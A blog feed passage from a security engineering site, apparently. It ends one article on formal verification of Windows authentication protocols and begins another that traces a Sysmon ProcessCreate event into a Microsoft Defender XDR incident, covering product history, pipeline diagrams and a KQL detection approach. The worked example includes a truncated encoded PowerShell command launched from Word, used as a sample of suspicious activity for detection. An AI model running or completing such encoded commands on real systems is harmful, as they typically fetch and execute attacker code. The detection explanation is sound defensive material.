No. Zerologon is a computational flaw -- AES in CFB8 mode with a zero initialization vector -- that a perfect-crypto symbolic model cannot represent [@cve-2020-1472]. In my Tamarin model, Netlogon also exhibits a structural reflection a symbolic prover can express -- a modeling observation, not a separately published Netlogon weakness -- but the real escalation turns on that arithmetic weakness, which a symbolic model can only be told about, not derive. Section 6 introduces the distinction where the pattern appears, and Section 9 places it exactly on the symbolic/computational boundary.


No. The computational layer -- primitives, key sizes, probabilities -- and the implementation layer are both outside symbolic scope. A clean symbolic proof narrows where the risk can live; it does not eliminate it. The right move is to combine symbolic, computational, and code-level tools [@sok-cac].


Because a single one-adversary model turns scattered analogies into a checked taxonomy, and because the same models prove *positive* guarantees that the per-CVE view could never produce -- forward secrecy, key-compromise-impersonation resistance, delegation containment under composition [@cremers-ipsec]. The known breaks are the calibration; the guarantees and the structure are the payoff.


Both, for different questions. Symbolic analysis scales to protocol logic across a whole corpus; computational analysis bounds the strength of the primitives; code-level analysis binds a model to the program that runs. The survey&apos;s recommendation is a layered stack, not a single winner [@sok-cac].


Section 8 has the full tool-by-tool comparison; the short answer is that ProVerif&apos;s speed advantage does not buy much here. The features that define this corpus -- Diffie-Hellman and post-quantum KEM key exchange, credentials whose state changes with every issued ticket, and unbounded sessions that need a concrete counterexample when a proof fails -- are exactly the combination that falls outside ProVerif&apos;s comfortable analysis fragment and lands inside Tamarin&apos;s [@tamarin-cav] [@proverif-home].

&lt;p&gt;So: was Windows authentication broken, or did it just look broken? The answer the corpus gives is precise. Twenty-three protocols, one adversary, twelve of them pushed harder -- and every break it could exhibit was one already on the record, each reducible to one of five structural shapes: a missing channel binding, an unkeyed integrity check, an untagged symmetric credential, an unbound token, or a restriction that dissolves under composition. The same models that exhibit those breaks also prove the fixes hold, even when you hand the attacker more power than the original analyses dared.&lt;/p&gt;
&lt;p&gt;The shapes themselves are old news. Channel binding, keyed integrity, direction tags, audience binding, and delegation protection were each understood when they were each invented. What was missing was a way to say, in one breath and with a machine to back it, that they are the &lt;em&gt;same five mistakes&lt;/em&gt; recurring across protocols that share no code -- and to draw the line, exactly, where a symbolic prover stops seeing and Zerologon&apos;s arithmetic begins.&lt;/p&gt;
&lt;p&gt;That line is the gift. It tells you that &quot;nothing new&quot; is not the tool shrugging; it is the tool reporting, honestly, that the logic is sound and the remaining risk lives one layer down. Carry the five questions with you. The next authentication protocol has not been written yet -- but when it is, you already know the five ways it is most likely to break.&lt;/p&gt;
</content:encoded><category>formal-verification</category><category>windows-authentication</category><category>tamarin-prover</category><category>kerberos</category><category>ntlm</category><category>dolev-yao</category><category>protocol-security</category><category>symbolic-analysis</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>One Event, Three Portals: How a Single Sysmon Line Becomes a Microsoft Defender XDR Incident</title><link>https://paragmali.com/blog/one-event-three-portals-how-a-single-sysmon-line-becomes-a-m/</link><guid isPermaLink="true">https://paragmali.com/blog/one-event-three-portals-how-a-single-sysmon-line-becomes-a-m/</guid><description>Trace a single Sysmon ProcessCreate event through six hops -- from Windows kernel emission to a unified Microsoft Defender XDR incident -- and where the convergence stops.</description><pubDate>Thu, 04 Jun 2026 00:00:00 GMT</pubDate><content:encoded>
A single Sysmon ProcessCreate event takes six observable hops to land in a Microsoft Defender XDR incident: kernel ETW emission, agent shipping through a Data Collection Rule, ingestion into a Log Analytics workspace, KQL detection in Microsoft Sentinel, optional alert correlation from Microsoft Defender for Cloud&apos;s CWPP plans, and finally entity-graph fan-in inside the unified Defender portal [@ms-learn-sysmon] [@ms-learn-ama-overview] [@ms-learn-mdc-xdr-concept] [@ms-learn-xdr-correlation]. Each hop adds latency, loses fidelity, or introduces a configuration cliff -- and one wrong word in a Data Collection Rule (`Microsoft-Event` instead of `Microsoft-WindowsEvent`) silently drops the entire pipeline [@ms-learn-ama-windows-events]. This article walks the full path with a concrete worked example, names where the convergence actually stops, and gives a six-step recipe to build the pipeline yourself.
&lt;h2&gt;1. One event, three portals, nine minutes&lt;/h2&gt;
&lt;p&gt;At 14:03:17 UTC on a Tuesday, &lt;code&gt;winword.exe&lt;/code&gt; on the host &lt;code&gt;MAL-CONTOSO-PRD-04&lt;/code&gt; spawns a child process: &lt;code&gt;powershell.exe -EncodedCommand JABwAD0AJwBoAHQAdABwADoALwAv...&lt;/code&gt;. Sysmon, which loads early in the boot sequence as a boot-start kernel driver, writes a single ProcessCreate record (Event ID 1) to the Windows event log channel &lt;code&gt;Microsoft-Windows-Sysmon/Operational&lt;/code&gt; [@ms-learn-sysmon]. The record is roughly two kilobytes of XML with a stable &lt;code&gt;ProcessGuid&lt;/code&gt; field that uniquely identifies the new process across the host&apos;s lifetime [@ms-learn-defrag-tools-sysmon].&lt;/p&gt;
&lt;p&gt;At 14:03:21 UTC, the same record appears in the &lt;code&gt;Event&lt;/code&gt; table of an Azure Log Analytics workspace named &lt;code&gt;law-contoso-secops&lt;/code&gt; [@ms-learn-event-table]. At 14:05:00 UTC, a Microsoft Sentinel scheduled analytics rule fires its five-minute KQL query, matches a parent-image heuristic (&lt;code&gt;winword.exe&lt;/code&gt; -&amp;gt; &lt;code&gt;powershell.exe -EncodedCommand&lt;/code&gt;), and produces a &lt;code&gt;SecurityAlert&lt;/code&gt; row whose &lt;code&gt;Entities&lt;/code&gt; JSON column names the host, the parent process, the child process, and the encoded command line [@ms-learn-sentinel-scheduled-rules] [@ms-learn-sentinel-entities]. At 14:07:42 UTC, a Microsoft Defender for Cloud (MDC) &lt;strong&gt;alert&lt;/strong&gt; -- emitted by the MDC for Servers cloud workload protection plan, which sits on top of the Microsoft Defender for Endpoint (MDE) sensor on that same host -- shows up in the workspace&apos;s &lt;code&gt;SecurityAlert&lt;/code&gt; table with the title &lt;code&gt;Suspicious PowerShell command line&lt;/code&gt; [@ms-learn-mdc-defender-servers] [@ms-learn-mdc-mde-integration]. And at 14:09:30 UTC -- nine minutes and thirteen seconds after the kernel call -- a single incident appears in the Microsoft Defender XDR portal at &lt;code&gt;security.microsoft.com&lt;/code&gt;. Its title: &lt;code&gt;Multi-stage incident on one endpoint&lt;/code&gt;. Its alert tab lists three rows: one from Sentinel, one from MDC, and (because MDE was also installed) one from Defender for Endpoint&apos;s native detection engine [@ms-learn-defender-xdr-incidents] [@ms-learn-xdr-correlation].&lt;/p&gt;
&lt;p&gt;Three independent detection systems, three different timestamps, three different alert grammars, one incident. How?&lt;/p&gt;
&lt;p&gt;That question is the spine of this article. It is not a marketing question -- &quot;look how unified it is&quot; -- because the convergence is partial and the seams are load-bearing. It is an engineering question: which hops happen where, what does each hop cost in latency and money, and where does the unification actually stop?&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Microsoft Defender XDR is not a single product. It is a correlation surface that fans in three structurally different pipelines: Sentinel&apos;s KQL analytics rules over Log Analytics, Defender for Cloud&apos;s cloud-workload-protection (CWPP) alerts from MDC plans (servers, containers, SQL, storage, App Service), and the native Defender stack (Endpoint, Identity, Office, Cloud Apps). The fan-in is real but partial: Sentinel cross-workspace correlation, MDC posture findings, and most third-party connectors stay outside the unified incident graph [@ms-learn-defender-xdr-overview] [@ms-learn-mdc-xdr-concept].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Here is the full path the Sysmon record takes from kernel to portal. Each numbered box is a real component with its own owner team, deployment lifecycle, and failure mode:&lt;/p&gt;

flowchart LR
  A[&quot;1 Sysmon kernel ETW provider on host&quot;]
  B[&quot;2 Azure Monitor Agent + Data Collection Rule&quot;]
  C[&quot;3 Log Analytics workspace Event/SecurityEvent tables&quot;]
  D[&quot;4 Sentinel scheduled or NRT analytics rule -- KQL&quot;]
  E[&quot;5 MDC alert via Defender for Servers + MDE sensor&quot;]
  F[&quot;6 Defender XDR correlation engine -- security.microsoft.com&quot;]
  A --&amp;gt; B --&amp;gt; C --&amp;gt; D --&amp;gt; F
  C --&amp;gt; E --&amp;gt; F
  classDef src fill:#e8f4ff,stroke:#2b6cb0,color:#1a365d
  classDef sink fill:#fffaf0,stroke:#dd6b20,color:#7b341e
  class A,B,C src
  class F sink
&lt;p&gt;The diagram understates how separate these hops are. Box 2 lives on the host. Box 3 is a multi-tenant Azure Data Explorer cluster [@ms-learn-adx-docs]. Box 4 runs on Sentinel&apos;s serverless query engine inside the workspace&apos;s home region. Box 5 is a Defender for Cloud plan with its own SKU, scoped to an Azure subscription. Box 6 is a separate web portal in a separate Microsoft 365 tenant scope. Each one rolled out at a different time, was renamed at least once, and absorbed a different earlier product. The next section recovers the lineage that explains why.&lt;/p&gt;
&lt;h2&gt;2. Three lineages that became one portal&lt;/h2&gt;
&lt;p&gt;The three pipelines that converge at hop 6 did not start as siblings. They started as three separate Microsoft product lines aimed at three different buyer personas: an Azure subscription owner who wanted posture scoring, a Windows engineer who wanted endpoint detection, and a SOC analyst who wanted a SIEM. Reading the path right-to-left -- from the unified portal back to its three roots -- is the only honest way to understand why the seams look the way they do.&lt;/p&gt;

A platform that ingests security-relevant logs from many sources, normalizes them into a queryable schema, runs correlation rules to produce alerts, and groups related alerts into incidents that a SOC analyst triages. Microsoft Sentinel is a SIEM [@ms-learn-sentinel-overview].

A platform (often packaged with a SIEM) that runs playbooks in response to alerts -- isolating a host, disabling an account, opening a ticket. In Microsoft&apos;s stack, SOAR is implemented as Azure Logic Apps invoked from Sentinel automation rules [@ms-learn-sentinel-soar].

A sensor that runs on a single endpoint, collects rich process / file / network / registry telemetry, applies behavioural detections locally and in the cloud, and exposes response actions (terminate process, isolate machine, collect investigation package). Microsoft Defender for Endpoint is an EDR [@ms-learn-mde-landing] [@ms-learn-mde-eda].

A correlation layer that fans in alerts and entities from multiple Microsoft-or-vendor detection products (endpoint, identity, email, cloud apps, cloud workloads) and merges related alerts into a single incident graph. Microsoft Defender XDR is Microsoft&apos;s XDR; the term was popularized by Palo Alto Networks in 2018 [@ms-learn-defender-xdr-overview] [@pan-blog-xdr-journey].
&lt;p&gt;The CSPM line started first. In &lt;strong&gt;December 2015&lt;/strong&gt;, Microsoft put Azure Security Center (ASC) into public preview as a per-subscription posture dashboard that scored Azure resources against a baseline of hardening recommendations [@azure-blog-asc-preview-2015]. ASC went generally available in &lt;strong&gt;July 2016&lt;/strong&gt; alongside JIT VM access [@ms-security-blog-asc-ga-2016]. Public sources frequently report ASC GA as &quot;October 2015&quot; or &quot;October 2016.&quot; The primary Azure blog from December 2015 explicitly says &quot;Azure Security Center -- now in public preview,&quot; and the July 2016 Microsoft Security blog announces the GA wave of new capabilities. The December 2015 preview / mid-2016 GA framing matches both authoritative announcements [@azure-blog-asc-preview-2015] [@ms-security-blog-asc-ga-2016]. Over the next five years ASC absorbed runtime protection plans -- Defender for Servers, SQL, Storage, App Service, Containers -- and was renamed &lt;strong&gt;Microsoft Defender for Cloud&lt;/strong&gt; at Ignite Fall 2021, the same wave that renamed Microsoft Cloud App Security to Microsoft Defender for Cloud Apps (MDCA) [@ms-learn-mdc-introduction] [@ms-learn-mdca-rename-2021].&lt;/p&gt;
&lt;p&gt;The SIEM line is much younger. Microsoft announced &lt;strong&gt;Azure Sentinel&lt;/strong&gt; in public preview on &lt;strong&gt;February 28, 2019&lt;/strong&gt; as the first cloud-native SIEM from a hyperscaler, built on top of Azure Log Analytics and the Kusto Query Language [@ms-blog-sentinel-preview-2019]. It went GA on &lt;strong&gt;September 24, 2019&lt;/strong&gt; [@ms-security-blog-sentinel-ga-2019]. It was renamed &lt;strong&gt;Microsoft Sentinel&lt;/strong&gt; in November 2021 (same Ignite wave). Sentinel inherited every Log Analytics integration that Azure Monitor already had, which meant it could ingest Windows event logs, syslog, Office 365 audit, Microsoft Entra ID sign-ins, and anything you could shove into a workspace with a custom collector [@ms-learn-sentinel-data-connectors-ref].&lt;/p&gt;
&lt;p&gt;The XDR line landed last. In &lt;strong&gt;September 2020&lt;/strong&gt; Microsoft announced &quot;Microsoft unified SIEM and XDR&quot; as a direction, and rolled the Office 365 ATP and Microsoft Defender ATP detection surfaces into a single portal called &lt;strong&gt;Microsoft 365 Defender&lt;/strong&gt; [@ms-security-blog-unified-siem-xdr-2020]. The portal was renamed &lt;strong&gt;Microsoft Defender XDR&lt;/strong&gt; in early 2024, and the SIEM and XDR portals were merged at Ignite November 2023, with the unified Microsoft security operations platform going generally available in July 2024 [@ms-blog-ignite-2023] [@ms-security-blog-unified-secops-2024]. The Sentinel experience inside the Azure portal will be &lt;strong&gt;retired on March 31, 2027&lt;/strong&gt; (a deadline extended from its original July 1, 2026 target); after that date, Sentinel lives only inside &lt;code&gt;security.microsoft.com&lt;/code&gt; [@ms-learn-sentinel-azure-portal-retiring] [@helpnetsec-sentinel-defender-timeline].&lt;/p&gt;

gantt
    title Three lineages converging at security.microsoft.com
    dateFormat YYYY-MM
    axisFormat %Y&lt;pre&gt;&lt;code&gt;section EDR line
Sysmon v1 (Sysinternals)         :done, 2014-08, 12M
Microsoft Defender ATP (EDR)     :done, 2016-03, 60M
Renamed Microsoft Defender for Endpoint :done, 2020-09, 24M

section CSPM and CWPP line
Azure Security Center preview    :done, 2015-12, 8M
Azure Security Center GA         :done, 2016-07, 64M
Renamed Microsoft Defender for Cloud :done, 2021-11, 36M

section SIEM line
Azure Sentinel preview           :done, 2019-02, 7M
Azure Sentinel GA                :done, 2019-09, 26M
Renamed Microsoft Sentinel       :done, 2021-11, 24M

section XDR convergence
Microsoft 365 Defender portal    :done, 2020-09, 38M
Sentinel merged into Defender portal :done, 2023-11, 8M
Unified secops GA                :done, 2024-07, 24M
Sentinel Azure portal retires    :crit, 2027-03, 1M
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Three things matter about this timeline for the rest of the article. First, the &lt;strong&gt;CSPM/CWPP line is older&lt;/strong&gt; than either SIEM or XDR -- which is why the Defender for Cloud team owns its own alert format, its own subscription-scoped permissions model, and its own portal at &lt;code&gt;portal.azure.com/#blade/Microsoft_Azure_Security&lt;/code&gt;, none of which fully merge into the unified Defender experience even today. Second, &lt;strong&gt;Sentinel inherited Log Analytics&lt;/strong&gt;, not the other way around -- so the storage substrate, the agent (Azure Monitor Agent), and the query language (KQL) all predate Sentinel by years and serve far more workloads than security. Third, &lt;strong&gt;the unified portal is the new arrival&lt;/strong&gt;, not the foundation. The convergence is grafted on top of three pre-existing pipelines, and that grafting -- not the products themselves -- is what makes the architecture interesting.&lt;/p&gt;
&lt;h2&gt;3. The pre-cloud SIEM bottleneck&lt;/h2&gt;
&lt;p&gt;To understand why Sentinel was built the way it was, hold the question in mind that every SIEM buyer asked their finance team between roughly 2008 and 2018: &lt;em&gt;&quot;Why does each new server cost me a license-tier upgrade?&quot;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Classic on-premises SIEMs -- Splunk Enterprise, ArcSight, QRadar -- priced by &lt;strong&gt;ingested gigabytes per day&lt;/strong&gt;, billed as a perpetual or annual license tied to a tier. Crossing a tier boundary triggered a forklift purchase. Storage was on-prem disk, and retention was constrained by how much steel you bought; compute was on the same hardware, so peak query load contended with peak ingest. The cost shape was step-wise, and the constraint that bound it most painfully was peak ingest rate.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Cost dimension&lt;/th&gt;
&lt;th&gt;Classic on-prem SIEM&lt;/th&gt;
&lt;th&gt;Cloud-native SIEM (Sentinel)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Ingest billing unit&lt;/td&gt;
&lt;td&gt;License tier (GB/day, stepped)&lt;/td&gt;
&lt;td&gt;Per-GB ingest (continuous) [@ms-learn-sentinel-billing]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Storage billing unit&lt;/td&gt;
&lt;td&gt;Bundled with license tier&lt;/td&gt;
&lt;td&gt;Per-GB-month retention (continuous) [@ms-learn-sentinel-billing]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Compute billing unit&lt;/td&gt;
&lt;td&gt;Bundled / hardware capex&lt;/td&gt;
&lt;td&gt;Per-query bytes scanned (serverless) [@ms-learn-adx-docs]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Capacity planning&lt;/td&gt;
&lt;td&gt;Estimate peak GB/day a year out&lt;/td&gt;
&lt;td&gt;None -- pay for what you ingested last hour&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;New data source onboarding&lt;/td&gt;
&lt;td&gt;Re-tier and order disks&lt;/td&gt;
&lt;td&gt;Add a Data Collection Rule [@ms-learn-dcr-overview]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The reframe Sentinel proposed -- and that the Kusto/Log Analytics substrate enabled -- was to &lt;strong&gt;separate the three cost axes&lt;/strong&gt;: ingest, storage retention, and query compute. Each axis bills continuously and independently. There is no tier to cross. Adding a new data source is a Data Collection Rule edit, not a procurement event. Retaining last quarter&apos;s logs another year is a per-GB-month flag, not a disk purchase [@ms-learn-sentinel-billing].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; &lt;strong&gt;Aha #1 -- the economic reframe.&lt;/strong&gt; What looked like a &lt;em&gt;pricing&lt;/em&gt; change (&quot;SaaS billing&quot;) was actually an &lt;em&gt;architectural&lt;/em&gt; change. Classic SIEMs bundled ingest, storage, and compute because the hardware bundled them. Once each axis lives on a different cloud service (Event Hubs / DCR for ingest, ADX for storage, KQL serverless query for compute), there is no bundle to defend. The SaaS bill is downstream of the deconstructed architecture, not the cause of it.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This deconstruction is what makes the Sentinel pipeline interesting upstream of the SOC. When ingest is a separately-billed continuous variable, the &lt;em&gt;Data Collection Rule&lt;/em&gt; becomes the most important security artifact in the deployment: it determines what flows in and therefore both what costs you incur and what you can possibly detect. (The accuracy-report follow-up that drives section 10 hinges on exactly one wrong word in a DCR.) When query compute is serverless and per-byte, a long-running threat hunt over a year of process-creation events is a question of dollars, not of capacity-plan slack. And when storage retention is a per-GB-month flag, the question &quot;should we retain this for compliance?&quot; decouples from &quot;do we have rack space?&quot;&lt;/p&gt;

Sentinel offers a flexible and predictable pricing model. Pay-as-you-go pricing lets you pay for what you use, while commitment tiers provide guaranteed discounts. [@ms-learn-sentinel-billing]
&lt;p&gt;That is the pricing-page sales line. The architectural truth underneath it is that the three pre-cloud bundles unbundled, and once they unbundled, the SIEM was free to grow horizontally with the rest of the cloud workload. That is exactly what happened with Sentinel between 2019 and 2024: it accumulated &lt;strong&gt;300+ data connectors&lt;/strong&gt; for every Azure service, every Microsoft 365 surface, every major SaaS log feed, and a long tail of third-party security tools [@ms-learn-sentinel-data-connectors-ref]. None of that catalog would have been economically sane on a per-GB/day license tier.&lt;/p&gt;
&lt;p&gt;But the unbundle was not free. The price of separately-billed continuous axes is that you have to &lt;em&gt;measure&lt;/em&gt; on all three axes. You now need to know your steady-state ingest rate, your retention policy, and your hunt query patterns. The next section steps inside the substrate that makes those measurements -- and the queries on top of them -- possible.&lt;/p&gt;
&lt;h2&gt;4. The cloud-native SIEM substrate: KQL on Log Analytics&lt;/h2&gt;
&lt;p&gt;Microsoft Sentinel is a thin layer over a much older substrate. That substrate is &lt;strong&gt;Azure Monitor Log Analytics&lt;/strong&gt;, which itself is a security-and-multitenancy wrapper around &lt;strong&gt;Azure Data Explorer (ADX)&lt;/strong&gt;, the cluster engine that runs &lt;strong&gt;Kusto Query Language (KQL)&lt;/strong&gt; [@ms-learn-adx-docs]. Understanding the stack matters because almost everything Sentinel can or cannot do is determined by what Log Analytics and KQL can or cannot do, not by anything Sentinel itself implements.&lt;/p&gt;

A multi-tenant namespace inside Azure Monitor that stores ingested telemetry in typed tables and exposes them for KQL query. Each workspace lives in a specific Azure region and Azure subscription, has its own access controls, and bills ingest and retention independently. Sentinel &quot;is enabled&quot; on a workspace; the workspace is the storage and query unit [@ms-learn-sentinel-overview].

A read-only, pipe-composed query language for time-series and tabular log data, originally developed for Azure Data Explorer. KQL is the lingua franca of Azure Monitor Logs, Microsoft Sentinel analytics, Microsoft Defender XDR advanced hunting, and several other Microsoft data services [@ms-learn-adx-docs] [@ms-learn-advanced-hunting].
&lt;p&gt;The layering is shown below. Notice that KQL itself spans &lt;strong&gt;four&lt;/strong&gt; Microsoft surfaces, of which Sentinel is just one. KQL&apos;s polymorphism -- one query language across Monitor, Sentinel, Defender XDR advanced hunting, and ADX itself -- is the single most under-appreciated decision in the Microsoft security stack. It is also the reason your KQL skills move across teams.&lt;/p&gt;

flowchart TB
  subgraph L1[&quot;Layer 1 -- storage cluster&quot;]
    ADX[&quot;Azure Data Explorer (Kusto engine)&quot;]
  end
  subgraph L2[&quot;Layer 2 -- managed namespace&quot;]
    LA[&quot;Log Analytics workspace -- typed tables, RBAC, regional&quot;]
  end
  subgraph L3[&quot;Layer 3 -- query surfaces&quot;]
    AZM[&quot;Azure Monitor logs -- ops + perf&quot;]
    SEN[&quot;Microsoft Sentinel -- SIEM analytics rules&quot;]
    XDR[&quot;Defender XDR -- advanced hunting&quot;]
    ADXQ[&quot;ADX direct -- analytics + BI&quot;]
  end
  ADX --&amp;gt; LA
  LA --&amp;gt; AZM
  LA --&amp;gt; SEN
  LA --&amp;gt; XDR
  ADX --&amp;gt; ADXQ
  classDef stor fill:#e8f4ff,stroke:#2b6cb0,color:#1a365d
  classDef ns fill:#fff5d6,stroke:#b7791f,color:#5f370e
  classDef ui fill:#e6fffa,stroke:#319795,color:#234e52
  class ADX stor
  class LA ns
  class AZM,SEN,XDR,ADXQ ui
&lt;p&gt;The substrate predates Sentinel by years. &lt;strong&gt;Log Analytics&lt;/strong&gt; was the rebranded form of &lt;em&gt;Operations Management Suite (OMS)&lt;/em&gt;, which Microsoft introduced in 2015 as a cloud companion to System Center Operations Manager. The agent that fed OMS -- the &lt;strong&gt;Microsoft Monitoring Agent (MMA)&lt;/strong&gt;, sometimes also called the &lt;em&gt;Log Analytics agent&lt;/em&gt; -- shared its agent lineage with the System Center Operations Manager agent and ran on Windows and Linux servers to ship event logs and performance counters to the workspace [@ms-learn-laa-deprecated] [@lunavi-oms-azure-monitor]. ADX (Kusto) was productised externally in 2018 after years of internal Microsoft use as the engine behind Bing telemetry, Office 365 ops, and Azure monitoring [@ms-learn-adx-docs].&lt;/p&gt;

The naming continuity is worth pausing on. *Log Analytics* (2016) replaced *OMS* (2015), which replaced *Application Insights workspaces* (2014), which absorbed parts of *Operations Manager* (2007). The data store underneath was *Kusto* the whole time. By the time Azure Sentinel launched in 2019 [@ms-blog-sentinel-preview-2019], the substrate had been hardened for four years at hyperscale, mostly for non-security workloads. Sentinel did not have to invent the storage; it inherited it. This is also why the same KQL skill maps onto application telemetry and infrastructure metrics, not just security.
&lt;p&gt;Two consequences of the substrate inheritance shape every hop downstream:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Schema is per-table, not per-product.&lt;/strong&gt; A Log Analytics workspace exposes typed tables like &lt;code&gt;Event&lt;/code&gt; (Windows event log records), &lt;code&gt;SecurityEvent&lt;/code&gt; (Windows Security channel), &lt;code&gt;Syslog&lt;/code&gt;, &lt;code&gt;Heartbeat&lt;/code&gt;, &lt;code&gt;SecurityAlert&lt;/code&gt;, &lt;code&gt;DeviceProcessEvents&lt;/code&gt; (mirrored from Defender XDR&apos;s advanced hunting schema), &lt;code&gt;Perf&lt;/code&gt;, and any number of &lt;code&gt;Custom_CL&lt;/code&gt; tables [@ms-learn-event-table] [@ms-learn-securityevent-table]. KQL queries are written against tables, not against products. A Sentinel analytics rule is just a saved KQL query that runs on a schedule and emits a row into &lt;code&gt;SecurityAlert&lt;/code&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Cross-workspace and cross-table joins are first-class.&lt;/strong&gt; Because the substrate is a real query engine, you can &lt;code&gt;join&lt;/code&gt; between &lt;code&gt;SecurityEvent&lt;/code&gt; and &lt;code&gt;SigninLogs&lt;/code&gt; and &lt;code&gt;DeviceProcessEvents&lt;/code&gt; in a single rule. You can use &lt;code&gt;workspace(&quot;law-other&quot;).Event&lt;/code&gt; to reach into a separate workspace. You can call &lt;code&gt;externaldata()&lt;/code&gt; to read from a blob. This expressive power is the source of both Sentinel&apos;s flexibility and its operational complexity: the rule that worked in test stops working in prod because the test workspace did not have a &lt;code&gt;SigninLogs&lt;/code&gt; table or because the cross-workspace permission is missing [@ms-learn-sentinel-threat-detection].&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;For the Sysmon worked example: the kernel record will land in the &lt;code&gt;Event&lt;/code&gt; table (because Sysmon&apos;s channel is treated as a generic Windows event log, not as the &lt;code&gt;SecurityEvent&lt;/code&gt; Security channel). The detection KQL will live as a Sentinel scheduled analytics rule that reads from &lt;code&gt;Event&lt;/code&gt;, filters to &lt;code&gt;Source == &quot;Microsoft-Windows-Sysmon&quot;&lt;/code&gt; and &lt;code&gt;EventID == 1&lt;/code&gt;, parses the XML payload (the next section will show the exact pattern), and emits a &lt;code&gt;SecurityAlert&lt;/code&gt; row. That &lt;code&gt;SecurityAlert&lt;/code&gt; row is what hop 6 ultimately fans in. The substrate did all the heavy lifting; Sentinel just wrote the rule.&lt;/p&gt;
&lt;h2&gt;5. The XDR reframe: from per-product portals to a single incident graph&lt;/h2&gt;
&lt;p&gt;If the SIEM substrate is &quot;many tables, one query engine,&quot; the XDR reframe is &quot;many alert sources, one incident graph.&quot; Microsoft Defender XDR exists because by 2019 a typical Microsoft enterprise customer had four or five separate Microsoft security portals -- one for Office 365 ATP, one for Microsoft Defender ATP, one for Microsoft Cloud App Security, one for Azure AD Identity Protection, and the Azure Security Center / Sentinel pair. Each portal had its own alert grammar, its own console, and its own analyst workflow. &lt;strong&gt;The XDR reframe is to keep the alert sources but merge the analyst surface.&lt;/strong&gt;&lt;/p&gt;

A correlation surface at `security.microsoft.com` that fans in alerts and entity data from the Microsoft Defender product family (Endpoint, Identity, Office 365, Cloud Apps), Microsoft Sentinel, and Microsoft Defender for Cloud&apos;s runtime CWPP plans, then merges related alerts into incidents using shared entity identifiers (user, device, file hash, IP, URL) [@ms-learn-defender-xdr-overview] [@ms-learn-defender-xdr-incidents].
&lt;p&gt;The mechanism the merge uses is the entity graph. When any of the source pipelines emits an alert, it is required to attach a set of typed entities (e.g., &lt;code&gt;Host = MAL-CONTOSO-PRD-04&lt;/code&gt;, &lt;code&gt;Process = winword.exe&lt;/code&gt;, &lt;code&gt;Account = CONTOSO\\jdoe&lt;/code&gt;) to that alert [@ms-learn-sentinel-entities]. The Defender XDR correlation engine reads incoming alerts, normalizes the entity values, and groups alerts whose entities overlap in time and identity into a single incident [@ms-learn-xdr-correlation]. That is the entire trick. It is conceptually simple. Operationally it has many edge cases, which section 8 returns to.&lt;/p&gt;
&lt;p&gt;For the worked example, the three alert sources (Sentinel KQL rule, MDC for Servers, MDE) each emit a separate alert. Each alert lists &lt;code&gt;Host = MAL-CONTOSO-PRD-04&lt;/code&gt; and (for two of the three) &lt;code&gt;ProcessGuid = {abc-...}&lt;/code&gt;. The correlation engine merges them on the host entity within a sliding time window. Result: one incident with three correlated alerts, not three separate incidents. The temporal fan-out is shown below; the fan-in geometry returns in section 6.6.&lt;/p&gt;

sequenceDiagram
    autonumber
    participant K as Host kernel (Sysmon)
    participant LA as Log Analytics workspace
    participant SEN as Sentinel scheduled rule
    participant MDC as MDC for Servers alert
    participant MDE as MDE native detection
    participant XDR as Defender XDR correlation
    K-&amp;gt;&amp;gt;LA: 14:03:21 -- Event row (ProcessGuid abc)
    LA-&amp;gt;&amp;gt;SEN: 14:05:00 -- 5-min query fires
    SEN-&amp;gt;&amp;gt;XDR: 14:05:04 -- SecurityAlert from KQL
    K-&amp;gt;&amp;gt;MDE: 14:03:17 -- local EDR sensor signal
    MDE-&amp;gt;&amp;gt;MDC: 14:06:30 -- MDE telemetry surfaces MDC alert
    MDC-&amp;gt;&amp;gt;XDR: 14:07:42 -- SecurityAlert from MDC plan
    MDE-&amp;gt;&amp;gt;XDR: 14:08:11 -- DeviceAlertEvents direct
    XDR-&amp;gt;&amp;gt;XDR: 14:09:30 -- merge on host + ProcessGuid -&amp;gt; Incident I-7842
&lt;p&gt;Two things in the diagram deserve to be noticed. First, the three alerts arrive in a window that is small but not synchronous: about six minutes from earliest to latest, all gated by the slowest pipeline (Sentinel&apos;s five-minute scheduled query). Second, &lt;strong&gt;MDE shows up twice&lt;/strong&gt;: once as the source that feeds MDC&apos;s CWPP plan (hop 5 in the master diagram), and once as a native Defender XDR alert source. The two are the same sensor data routed through two different alert grammars to the same correlation surface. The fact that the correlation engine deduplicates them on &lt;code&gt;ProcessGuid&lt;/code&gt; is not accidental -- it is the load-bearing identifier that makes the unification work for endpoint events. For non-endpoint sources (cloud-control-plane alerts from MDC for Storage, for example), there is no equivalent shared identifier, and the deduplication has to fall back on weaker entity matches like account name or IP. That is where the convergence frays.&lt;/p&gt;
&lt;p&gt;The next section walks the six hops in order, naming the artifact at each hop and the failure mode that lives there. Hops 1 through 4 are the SIEM lineage. Hop 5 is the CWPP lineage. Hop 6 is the XDR fan-in.&lt;/p&gt;
&lt;h2&gt;6. Walking the six hops&lt;/h2&gt;
&lt;h3&gt;6.1 Hop 1 -- The kernel emission&lt;/h3&gt;
